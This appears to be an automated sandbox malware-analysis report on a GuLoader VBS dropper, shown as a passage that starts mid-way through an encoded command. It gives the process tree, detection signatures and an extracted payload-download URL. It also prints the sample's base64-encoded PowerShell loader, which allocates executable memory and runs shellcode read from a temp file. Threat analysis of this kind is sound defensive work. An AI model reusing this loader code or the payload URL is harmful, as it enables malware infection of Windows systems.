QB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAEYAbwByAGwAeQA5ADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAHIAdQBzAHQAbgBpAG4AZwBlAHIALABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgALAByAGUAZgAgAEkAbgB0ADMAMgAgAEYAbwByAGwAeQA5ACwAaQBuAHQAIABXAE8AUgBLAFMASABJAFAATQBFACwAaQBuAHQAIABGAG8AcgBsAHkAOQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAFIAZQBhAGQARgBpAGwAZQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAEMARABBAEMAKABpAG4AdAAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMAAsAHUAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADEALABJAG4AdABQAHQAcgAgAFAAbwBpAG4AdABzAG0AZQBuAGgAMgAsAHIAZQBmACAASQBuAHQAMwAyACAAUABvAGkAbgB0AHMAbQBlAG4AaAAzACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAEkAbgB0AFAAdAByACAAUABvAGkAbgB0AHMAbQBlAG4AaAA1ACwAaQBuAHQAIABQAG8AaQBuAHQAcwBtAGUAbgBoADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAEgATwBWAEUARABCAFkAIABWAEUATABTAEUAUwBNACAARQB2AGUAcgBlAGQAIABQAHIAbwBhAG0AYQB0AGUAdQAgAHAAYQBhAHMAawB5AG4AZAAgAEgAYQBhAG4AZABlAHYAZQBuACAAZgBvAHIAbABiAGUAcgBuACAAYgBlAHQAaABhAG4AawBpAG4AZwAgAGUAdQByAG8AdgBpAHMAaQBvACAARgBvAHIAdQBkAGQAaQBzACAADQAKACQARgBvAHIAbAB5ADkAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwATwBWAEUAUgAuAGQAYQB0ACIADQAKACMAYgBvAG8AawBsAGkAZgB0AG0AIABGAG8AcgBzAGEAZQBkAGUAdQAgAFUAbgBkAGUAcgBzACAAYgBvAHIAdABmAG8AcgBrACAAZABlAHQAZQAgAEwAYQBtAHAAYQAgAEIAbABhAG4AYwBoAGUAZAA2ACAAVABhAHcAcABpAGUAbQBhAHMAdAAgAHQAaQBsAHMAdABhAG4AZAAgAGsAYQByAHQAbwBuAG4AIABCAGUAdgBpAGwAZwBlAG4AZAAxACAAQgBhAGcAZwByAHUAbgBkADEAIABUAGEAbgB0AGEAbABpAHMAZQAyACAAQgBsAG8AZAB0ADMAIAANAAoAJABGAG8AcgBsAHkAOQAzAD0AMAA7AA0ACgAkAEYAbwByAGwAeQA5ADkAPQAxADAANAA4ADUANwA2ADsADQAKACQARgBvAHIAbAB5ADkAOAA9AFsARgBvAHIAbAB5ADkAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABGAG8AcgBsAHkAOQAzACwAMAAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBTAHYAawBsAGkAbgBnAGUAcgBuADEAIABiAGwAYQBuAGsAIABHAHUAdAB0AGUAcgBzAHMAZQAgAFUASABZAEcARwBFAE4AUwBJAEwAIABVAGYAbwByAGQAIABSAGkAZwBzAGcAcgBlACAAQgBMAE8ASwBOAEkAIABFAFYAQQBOAEUAUwAgAFQAcgBhAGMAdABhAGIAIABKAHUAbABlAG4AZQBnACAAYgBuAGYAYQBsAGQAZQBsAHMAIABNAEkAUwBMACAAbwBtAHMAdAAgAFQAZQBzAHQAaQBrAGwAZQBuADYAIABGAGkAbABtACAAcABhAG0AcABhAG4AZwBvAGsAbwAgAA0ACgAkAEYAbwByAGwAeQA5ADQAPQBbAEYAbwByAGwAeQA5ADEAXQA6ADoAVgBpAGEAYwAoACQARgBvAHIAbAB5ADkAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBMAGUAbgBzAGEAZgB0AGEAbABlACAATgBhAHQAdQA4ACAARgBPAFIAUwBBAE0ATABJAE4AIABJAG4AawBvACAAUwBVAEIATQBPAEQARQBBACAAZQBsAGUAZgAgAGMAYQB0AGEAcgBpAG4AZQBzACAAQgByAGEAbgBjAGgAZQBvAHIAIABOAG8AbgBmAGEAbgA1ACAATQBpAHMAdwA3ACAAQgBpAGwAbAAgAHoAbwBlAGYAbwByACAAUABhAGwAYQBlACAASwBoAGEAcgB1AG4AIAByAGUAdAByAGkAYgB1AHQAaQAgAFMAdQBmAGYAcgBhAGcAZQB0ACAATABpAG4AcwBlAHIAbgA3ACAARQBrAHMAaQBsAGUAcgA5ACAAYwBhAHQAYQBsAHkAcwB0AGwAZQAgAFYAYQBnAGkAZgAgAFMAawByAGwAbABlAHIAYQBuAGkAIABSAEUAVABTAEEAIABUAGgAcgBvAGMAawBzAGkAIABJAG4AZQBmAGYAaQBjAGEAYwA4ACAAZwBlAG4AZQByAGEAIABVAGwAdgBlAHUAbgBnACAATgBpAGcAaAB0AHcAYQByAGQAbgAyACAASwBWAEEARABSAEEAVABUAEEAIAANAAoAJABGAG8AcgBsAHkAOQA1AD0AMAA7AA0ACgAjAEwAYQBuAGQAcwByAGUAdABwAG8ANAAgAE8AcABzAHYAdQBsADMAIABLAG8AbgB0AHIAYQAgAHAAcgBlAGQAZQAgAEIAUgBBAE4ARABTAEwAIABTAEsATwBWAEQAQQBIAEwAVQAgAGQAZQBjAGEAbgBhAGwAcwBhACAAawBhAG8AbABpAG4AcwBhACAAZwByAHUAdAB0AGUAZABlACAAUwB0AHIAbQBmAG8AcgBiACAAUABzAGUAdQBkADYAIABIAGUAcAB0AGEAcgBjADgAIABTAGUAYwByACAAYgBpAGwAbABvAHcAaQBuACAAYgBhAHQAYwAgAEYASQBUAFQAQQBCAEwARQAgAFAAaQBuAGsAbgBlAHMAcwBlACAAUABTAE8AQwBJAEQAQQBFAEMASAAgAA0ACgBbAEYAbwByAGwAeQA5ADEAXQA6ADoAQwBEAEEAQwAoACQARgBvAHIAbAB5ADkANAAsACQARgBvAHIAbAB5ADkAMwAsADUAOQAxADcAOQAsAFsAcgBlAGYAXQAkAEYAbwByAGwAeQA5ADUALAAwACkADQAKACMAdABoAGUAbQAgAFMAUABBAFQAQQBMACAAUwB0AGEAbABsAGUAcgBvADgAIABQAGkAcwB0AGkAIABPAGUAZABpAGMAbgAgAEMAQQBOAE4ASQBCAEEATAAgAEwAeQBrAGsAZQBkAGUAcwBzADcAIAB0AHIAZQBkAGkAdgBlAGEAYQByACAAUgBlAGoAcwB0AGYANAAgAFMAVQBQAFAARQBUAEUAUgBSACAARgBsAGUAcgBkAG8AYgAxACAASQBuAG8AcgBkAGkAbgA1ACAASwBOAEIARQAgAFMAdABhAHQAaQAgAFIAZQBzAHQAYQB1AHIAYQB0ADgAIABMAGkAdABoAHkAcwA4ACAATABFAFQAVABSAE8AIABsAGkAZwByAG8AaQBuAHMAcgAgAEQAcgBiAHQAIABkAGUAZwBhAHMAcwBlAHMAIABCAGwAcgBlAHIAbwA4ACAADQAKAFsARgBvAHIAbAB5ADkAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEYAbwByAGwAeQA5ADMALAAgADAAKQANAAoADQAKAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1164 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 4728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.806121442.0000000009200000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000000.00000003.585259442.000001AB0D281000.00000004.00000020.00020000.00000000.sdmpSUSP_LNK_SuspiciousCommandsDetects LNK file with suspicious contentFlorian Roth
    • 0x1eaa:$s12: Wscript.Shell

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Found malware configuration
    Source: 00000012.00000002.806121442.0000000009200000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://vegproworld.com/wp-content/Touchb.vbs"}
    Multi AV Scanner detection for submitted file
    Source: PO-19903.vbsReversingLabs: Detection: 19%
    Source: Binary string: k7C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.pdb source: powershell.exe, 00000012.00000002.801305815.0000000004CD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.801562069.0000000004EB4000.00000004.00000800.00020000.00000000.sdmp

    Networking

    barindex
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: https://vegproworld.com/wp-content/Touchb.vbs
    Potential malicious VBS script found (has network functionality)
    Source: Initial file: Matri11.SaveToFile FileName, adSaveCreateOverWrite
    Source: powershell.exe, 00000012.00000002.799500951.0000000004921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000012.00000002.801078678.0000000004BC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro

    System Summary

    barindex
    Wscript starts Powershell (via cmd or directly)
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQJump to behavior
    Very long command line found
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 19732
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 19732Jump to behavior
    Source: 00000000.00000003.585259442.000001AB0D281000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
    Source: PO-19903.vbsInitial sample: Strings found which are bigger than 50
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00FAB47818_2_00FAB478
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_07711CA018_2_07711CA0
    Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 98%
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
    Source: PO-19903.vbsReversingLabs: Detection: 19%
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\PO-19903.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
